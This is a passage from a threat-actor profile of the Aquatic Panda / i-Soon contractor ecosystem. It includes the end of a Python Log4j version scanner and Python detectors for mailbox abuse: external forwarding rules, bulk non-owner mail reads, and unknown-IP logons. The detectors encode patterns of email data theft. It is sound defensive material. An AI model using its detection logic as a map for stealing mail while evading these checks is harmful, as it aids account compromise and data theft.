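    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(_jar_with_log4j("2.17.1"))


def demo():
    """Scan the constructed tree; returns sorted (outer archive, version, vulnerable)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return sorted(
            (os.path.relpath(p.split("!/")[0], root).replace(os.sep, "/"), ver, vuln)
            for p, ver, vuln in scan_tree(root)
        )


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Point `scan_tree` at application-server and middleware directories (VMware Horizon, Tomcat webapps, vendor appliances mounted for inspection), not just `/usr/lib`; the embedded copy inside a WAR is the one that survives OS patching.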
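The email monitoring item above names three alerts worth building first: forwarding rule creation, bulk mailbox reads by accounts other than the owner, and logons from unusual locations. The following Python is an added example, not the page's or Microsoft's code, and runs those three checks over constructed records. The record layout is a simplified stand-in modelled on Exchange mailbox audit events (the operation names `New-InboxRule`, `Set-InboxRule`, `Set-Mailbox` and `MailItemsAccessed`, and the forwarding parameter names, are real Exchange ones; the `MailboxOwner`, `ItemCount` and `ClientIP` fields, the organisation domain, the address ranges and the 500-item threshold are assumptions).

```python
"""Mailbox-abuse detections over constructed, simplified Exchange audit records:
forwarding to addresses outside the organisation, bulk access to a mailbox by a
non-owner, and activity from outside known address ranges. Added example."""
import ipaddress
from collections import Counter

ORG_DOMAINS = {"corp.example"}                       # assumption
KNOWN_RANGES = [ipaddress.ip_network("10.0.0.0/8"),  # assumption: office + VPN
                ipaddress.ip_network("198.51.100.0/24")]
# Exchange cmdlet parameters that cause mail to leave the mailbox.
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress"}
RULE_OPS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}
BULK_THRESHOLD = 500                                 # assumption: items per actor/mailbox


def _is_external(address):
    return address.split("@")[-1].lower() not in ORG_DOMAINS


def detect_forwarding(records):
    """(actor, operation, destination, is_external) for each forwarding change."""
    hits = []
    for r in records:
        if r["Operation"] not in RULE_OPS:
            continue
        for p in r.get("Parameters", []):
            if p["Name"] in FORWARD_PARAMS:
                dest = p["Value"]
                if dest.lower().startswith("smtp:"):  # Set-Mailbox stores 'smtp:user@host'
                    dest = dest[5:]
                hits.append((r["UserId"], r["Operation"], dest, _is_external(dest)))
    return hits


def detect_bulk_access(records, threshold=BULK_THRESHOLD):
    """(actor, mailbox owner, items) where a non-owner read >= threshold items."""
    items = Counter()
    for r in records:
        if r["Operation"] == "MailItemsAccessed" and \
                r["UserId"].lower() != r["MailboxOwner"].lower():
            items[(r["UserId"], r["MailboxOwner"])] += r["ItemCount"]
    return [(actor, owner, n) for (actor, owner), n in items.items() if n >= threshold]


def detect_unknown_ips(records):
    """Distinct (actor, ip) pairs seen from outside KNOWN_RANGES."""
    seen = set()
    for r in records:
        ip = ipaddress.ip_address(r["ClientIP"])
        if not any(ip in net for net in KNOWN_RANGES):
            seen.add((r["UserId"], r["ClientIP"]))
    return sorted(seen)


# Constructed sample records.
RECORDS = [
    {"Operation": "New-InboxRule", "UserId": "alice@corp.example", "ClientIP": "203.0.113.9",
     "Parameters": [{"Name": "Name", "Value": "sync"},
                    {"Name": "ForwardTo", "Value": "collector@mail.example"}]},
    {"Operation": "Set-Mailbox", "UserId": "svc-exch@corp.example", "ClientIP": "10.1.2.3",
     "Parameters": [{"Name": "Identity", "Value": "bob"},
                    {"Name": "ForwardingSmtpAddress", "Value": "smtp:bob@corp.example"}]},
    {"Operation": "MailItemsAccessed", "UserId": "svc-backup@corp.example",
     "MailboxOwner": "ceo@corp.example", "ItemCount": 350, "ClientIP": "10.5.5.5"},
    {"Operation": "MailItemsAccessed", "UserId": "svc-backup@corp.example",
     "MailboxOwner": "ceo@corp.example", "ItemCount": 300, "ClientIP": "10.5.5.5"},
    {"Operation": "MailItemsAccessed", "UserId": "carol@corp.example",
     "MailboxOwner": "carol@corp.example", "ItemCount": 900, "ClientIP": "198.51.100.20"},
]

if __name__ == "__main__":
    print(detect_forwarding(RECORDS))
    print(detect_bulk_access(RECORDS))
    print(detect_unknown_ips(RECORDS))
```

The external-destination flag is what separates a routine delegate setup from the inbox-sale pattern the page describes; an internal forward may still merit review, but an external one by a standard user from an unknown address should page someone.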
The i-Soon leak and subsequent DOJ indictments offered the clearest documented view of how China operationalizes state-directed hacking at scale: through a commercialized contractor ecosystem where private companies compete for government hacking contracts, conduct speculative intelligence collection on their own initiative, and sell the results to the highest-bidding government bureau. The leaked documents showed i-Soon employees complaining about underpayment, customers haggling over rates for email inboxes, and management navigating government clients' competing demands. This is not a shadowy intelligence service — it is a business, with all the dysfunction and financial pressure that implies. The implication for defenders is significant: unlike a tightly controlled state intelligence unit with disciplined operational security, contractor-model actors like i-Soon cast a wide net and accept higher risk of detection because the financial incentive is volume-based, not mission-specific. Victims may be compromised not because they are priority targets of the Chinese state but because they were accessible and potentially saleable. This raises the floor of who needs to defend against nation-state-affiliated actors considerably — any organization with any data that a Chinese government bureau might pay for is, in principle, within scope.
Sources & Further Reading
Attribution and references used to build this profile.
- ESET Research — Operation FishMedley (March 2025)
- U.S. Department of Justice — Justice Department Charges 12 Chinese Contract Hackers (March 5, 2025)
- FBI — Aquatic Panda Cyber Threat Actors (Most Wanted)
- MITRE ATT&CK — Aquatic Panda / FishMonger
- Wikipedia — i-Soon Leak
- SOCRadar — Dark Web Profile: Aquatic Panda (2025)
- Threatpost — APT Aquatic Panda Targets Universities with Log4Shell Exploit (2021)